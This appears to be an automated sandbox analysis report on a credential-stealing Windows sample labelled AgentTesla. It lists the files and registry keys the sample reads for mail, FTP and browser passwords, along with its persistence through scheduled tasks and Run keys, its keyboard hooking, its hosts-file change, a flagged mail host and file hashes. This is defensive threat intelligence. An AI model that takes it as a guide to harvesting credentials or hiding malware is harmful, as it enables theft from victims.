                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Users\user\Desktop\statement of account.exe | File written: C:\Windows\System32\drivers\etc\hosts

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR
                Source: C:\Users\user\Desktop\statement of account.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\statement of account.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\statement of account.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\statement of account.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\statement of account.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara match | File source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR
                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | 211 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 1 File and Directory Permissions Modification | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | 111 Input Capture | 114 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | 111 Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 23 Software Packing | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 756035; Sample: statement of account.exe; Start date: 29/11/2022; Architecture: WINDOWS; Score: 100
                Signatures on the root node: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 11 other signatures
                Processes started from the root: LtdekfbHULJt.exe, statement of account.exe, LIhMQ.exe, LIhMQ.exe
                • LtdekfbHULJt.exe: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file. Started: LtdekfbHULJt.exe, schtasks.exe
                • statement of account.exe: dropped C:\Users\user\AppData\...\LtdekfbHULJt.exe (PE32), C:\Users\user\AppData\Local\...\tmp86BD.tmp (XML), C:\Users\...\statement of account.exe.log (ASCII); Injects a PE file into a foreign processes. Started: statement of account.exe, schtasks.exe
                • LIhMQ.exe: Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines). Started: LIhMQ.exe, schtasks.exe, LIhMQ.exe
                • LtdekfbHULJt.exe (child process): Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier)
                • schtasks.exe (started by LtdekfbHULJt.exe): started conhost.exe
                • statement of account.exe (child process): network: mail.clipjoint.co.nz 27.54.86.236, 49698, 49699, 49700, DREAMSCAPE-AS-AP Dreamscape Networks Limited AU, Australia; 192.168.2.1 unknown unknown. Dropped: C:\Users\user\AppData\Roaming\...\LIhMQ.exe (PE32), C:\Windows\System32\drivers\etc\hosts (ASCII), C:\Users\user\...\LIhMQ.exe:Zone.Identifier (ASCII). Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Modifies the hosts file
                • schtasks.exe (started by statement of account.exe): started conhost.exe
                • LIhMQ.exe (child process): Installs a global keyboard hook
                • schtasks.exe (started by LIhMQ.exe): started conhost.exe

                Source | Detection | Scanner | Label
                statement of account.exe | 69% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                statement of account.exe | 37% | Virustotal
                statement of account.exe | 100% | Joe Sandbox ML
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | 69% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | 69% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                Source | Detection | Scanner | Label
                3.0.statement of account.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                mail.clipjoint.co.nz | 27.54.86.236 | true | true | | unknown
                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        27.54.86.236 | mail.clipjoint.co.nz | Australia | 38719 | DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | true
                                        IP
                                        192.168.2.1
                                        Joe Sandbox Version: 36.0.0 Rainbow Opal
                                        Analysis ID: 756035
                                        Start date and time: 2022-11-29 14:59:08 +01:00
                                        Joe Sandbox Product: CloudBasic
                                        Overall analysis duration: 0h 9m 29s
                                        Hypervisor based Inspection enabled: false
                                        Report type: light
                                        Sample file name: statement of account.exe
                                        Cookbook file name: default.jbs
                                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of new started processes analysed: 25
                                        Number of new started drivers analysed: 0
                                        Number of existing processes analysed: 0
                                        Number of existing drivers analysed: 0
                                        Number of injected processes analysed: 0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode: default
                                        Analysis stop reason: Timeout
                                        Detection: MAL
                                        Classification: mal100.troj.adwa.spyw.evad.winEXE@21/10@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information: Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                                        • Not all processes were analyzed; the report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        Time | Type | Description
                                        15:00:10 | API Interceptor | 658x Sleep call for process: statement of account.exe modified
                                        15:00:15 | Task Scheduler | Run new task: LtdekfbHULJt path: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        15:00:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        15:00:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        15:00:48 | API Interceptor | 194x Sleep call for process: LtdekfbHULJt.exe modified
                                        15:00:49 | API Interceptor | 346x Sleep call for process: LIhMQ.exe modified
                                        Process: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        File Type: ASCII text, with CRLF line terminators
                                        Category: dropped
                                        Size (bytes): 1216
                                        Entropy (8bit): 5.355304211458859
                                        Encrypted: false
                                        SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5: 69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious: false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):777216
                                        Entropy (8bit):7.5421915933868116
                                        Encrypted:false
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        MD5:808F76963A9F42AD7310A3B7D65C7983
                                        SHA1:F748A841B2EC35BC40ED0BACBE953C28BC11A8A6
                                        SHA-256:9F04B0B059E331845F8C3F9F4F83C785B07766529BB24DBBFB02FBAB9E414938
